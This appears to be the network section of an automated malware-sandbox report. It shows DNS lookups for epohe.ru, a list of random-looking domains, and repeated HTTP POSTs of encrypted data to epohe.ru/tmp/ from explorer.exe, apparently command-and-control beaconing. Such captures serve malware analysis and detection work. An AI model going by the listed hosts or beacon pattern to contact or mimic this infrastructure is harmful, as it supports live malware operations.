                                              Sep 2, 2024 11:45:02.566909075 CEST1.1.1.1192.168.2.40xed70No error (0)epohe.ru211.171.233.129A (IP address)IN (0x0001)false
                                              Sep 2, 2024 11:45:02.566909075 CEST1.1.1.1192.168.2.40xed70No error (0)epohe.ru109.121.204.14A (IP address)IN (0x0001)false
                                              Sep 2, 2024 11:45:02.566909075 CEST1.1.1.1192.168.2.40xed70No error (0)epohe.ru197.164.156.210A (IP address)IN (0x0001)false
                                              Sep 2, 2024 11:45:02.566917896 CEST1.1.1.1192.168.2.40xed70No error (0)epohe.ru102.189.104.201A (IP address)IN (0x0001)false
                                              Sep 2, 2024 11:45:02.566917896 CEST1.1.1.1192.168.2.40xed70No error (0)epohe.ru92.36.226.66A (IP address)IN (0x0001)false
                                              Sep 2, 2024 11:45:02.566917896 CEST1.1.1.1192.168.2.40xed70No error (0)epohe.ru211.202.224.10A (IP address)IN (0x0001)false
                                              Sep 2, 2024 11:45:02.566917896 CEST1.1.1.1192.168.2.40xed70No error (0)epohe.ru211.253.81.39A (IP address)IN (0x0001)false
                                              Sep 2, 2024 11:45:02.566917896 CEST1.1.1.1192.168.2.40xed70No error (0)epohe.ru190.156.239.49A (IP address)IN (0x0001)false
                                              Sep 2, 2024 11:45:02.566917896 CEST1.1.1.1192.168.2.40xed70No error (0)epohe.ru93.103.167.123A (IP address)IN (0x0001)false
                                              Sep 2, 2024 11:45:02.566917896 CEST1.1.1.1192.168.2.40xed70No error (0)epohe.ru187.211.53.230A (IP address)IN (0x0001)false
                                              Sep 2, 2024 11:45:02.566917896 CEST1.1.1.1192.168.2.40xed70No error (0)epohe.ru211.171.233.129A (IP address)IN (0x0001)false
                                              Sep 2, 2024 11:45:02.566917896 CEST1.1.1.1192.168.2.40xed70No error (0)epohe.ru109.121.204.14A (IP address)IN (0x0001)false
                                              Sep 2, 2024 11:45:02.566917896 CEST1.1.1.1192.168.2.40xed70No error (0)epohe.ru197.164.156.210A (IP address)IN (0x0001)false
                                              • www.darkviolet-alpaca-923878.hostingersite.com
                                              • ynvnjwpyrjjaik.com
                                                • epohe.ru
                                              • rbwviinahwkfdp.net
                                              • nrvcprjhuix.org
                                              • paladqffwlsbfx.net
                                              • oerusfyadyvfpmjm.com
                                              • nbmnkedntct.net
                                              • esdminlvrkeqcklx.net
                                              • yrljtsnfbvqitue.org
                                              • wddxovmhfhdjjf.com
                                              • mroqivvlsgi.com
                                              • sloulillyitjtj.com
                                              • ldwswurfvgvwu.net
                                              • poatfeiydcmxgiom.org
                                              • mhwdtchfjlofmuv.org
                                              • dyovtuslfwnpfvr.net
                                              • agwwkiqfcegkjh.net
                                              • ivdbemhblrd.org
                                              • qsasppprtpxcq.com
                                              • iwrtbbnydhaevbhj.com
                                              • scammxgavejetg.org
                                              • jjpobfosorxh.com
                                              • tfebikfnyin.net
                                              • pkxpvxaevqgmdlaa.net
                                              • fprowwsvixkulpo.net
                                              • pwnffqufngll.com
                                              • sxaiuwdsglaywc.net
                                              • wuipisboawsvs.com
                                              • kvkvjbbqhfudfxqw.com
                                              • 91.202.233.158
                                              • jedxkbbxtvyjefdy.net
                                              • mgxufuqrjem.com
                                              • jugejrjfmrsbqcyx.net
                                              • mgcnjvitwupuplla.com
                                              • veyluekclhthgug.net
                                              • xdpeyvjwjcxoduxb.com
                                              • ngmwxgboyrumd.org
                                              • dppdsmckyoiatanc.net
                                              • iunavucrkiocdvg.com
                                              • weelpnjtteeqb.net
                                              • mdaxajnxssfl.net
                                              • epvctlndxvceigyl.org
                                              • xbdxgcigtdnc.net
                                              • qhwbbbidikeuoya.org
                                              • ktmmebudltbr.org
                                              • psyhdeolvmp.net
                                              • ckgifyjrwgvlwluh.org
                                              • wtcwkmlaiuwf.net
                                              • asfcixluuutwn.org
                                              • jlbunmblotwunq.net
                                              • vfaiilfonqsqudx.org
                                              • qjqwiddoadvtn.com
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449737102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:27.847635984 CEST271OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ynvnjwpyrjjaik.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 205
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:27.847656012 CEST205OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 35 39 b3 fa
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu59Jhzi2lO/aAo.<x>]Jo#0UQ|+2D{YPI<WbI~I
                                              Sep 2, 2024 11:42:29.123262882 CEST152INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:28 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 04 00 00 00 72 e8 86 ea
                                              Data Ascii: r
                                              Sep 2, 2024 11:42:29.123296022 CEST152INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:28 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 04 00 00 00 72 e8 86 ea
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449738102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:29.131845951 CEST271OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://rbwviinahwkfdp.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 300
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:29.131867886 CEST300OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 5f 22 fa b9
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu_"axS_t2tL#40aos=(L"OU<(xE<1}_K;PSC>Fx ;u5~vCFZxJHF
                                              Sep 2, 2024 11:42:30.049175024 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:29 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449739102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:30.063709021 CEST268OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://nrvcprjhuix.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 319
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:30.063725948 CEST319OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 7d 47 e3 ae
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu}G%sMf~Qcow;at X0.@V[eV ;i`lEPCtmA)(O6 $hA)vXD
                                              Sep 2, 2024 11:42:30.973990917 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:30 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.449740102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:30.981873035 CEST271OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://paladqffwlsbfx.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 287
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:30.981898069 CEST287OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 55 47 be f3
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuUG[B@EMVE=yTVdWC3RzUQvsQE<jD?J[y;/rU9!@SAD/-n\`2@h )F)
                                              Sep 2, 2024 11:42:32.132819891 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:31 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                              Sep 2, 2024 11:42:32.133090019 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:31 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449741102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:32.144936085 CEST273OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://oerusfyadyvfpmjm.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 271
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:32.144970894 CEST271OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 61 4c f0 aa
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuaL^)msGg4pnsN-0lfKC9VV7VSgG32q_3o][x5];&UC!I]'p+wP_6l
                                              Sep 2, 2024 11:42:33.076257944 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:32 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.449742102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:33.085263968 CEST268OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://nbmnkedntct.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 313
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:33.085287094 CEST313OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 5e 46 eb b8
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu^Fo1:Syvmr."h!*.8{GUNGx`(%I RD?DU-nSFhY0klECn/if9Qo
                                              Sep 2, 2024 11:42:34.012614965 CEST137INHTTP/1.1 200 OK
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:33 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.449743102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:34.020538092 CEST273OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://esdminlvrkeqcklx.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 188
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:34.020560026 CEST188OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 6e 39 da ec
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vun9qWoO>r$Cmu22_;o-4]W:2oOM7Bo\V@O7a
                                              Sep 2, 2024 11:42:34.926078081 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:34 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.449744102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:34.934243917 CEST272OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://yrljtsnfbvqitue.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 246
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:34.934336901 CEST246OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 7e 20 ab 82
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu~ V_i%'SWaauhGPI^!GGh?{a>\4vmje}C2/#sdU8CuIwdGw
                                              Sep 2, 2024 11:42:35.855348110 CEST137INHTTP/1.1 200 OK
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:35 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.449745102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:35.887342930 CEST271OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://wddxovmhfhdjjf.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 229
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:35.887362957 CEST229OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 72 0a e1 85
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vurm=^Ymtad+!>MgIhddR%+W&SXYsy)O`qZ2>(:<'h]%S)4;Bd
                                              Sep 2, 2024 11:42:36.812870979 CEST137INHTTP/1.1 200 OK
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:36 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.449746102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:36.826921940 CEST268OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://mroqivvlsgi.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 281
                                              Host: epohe.ru
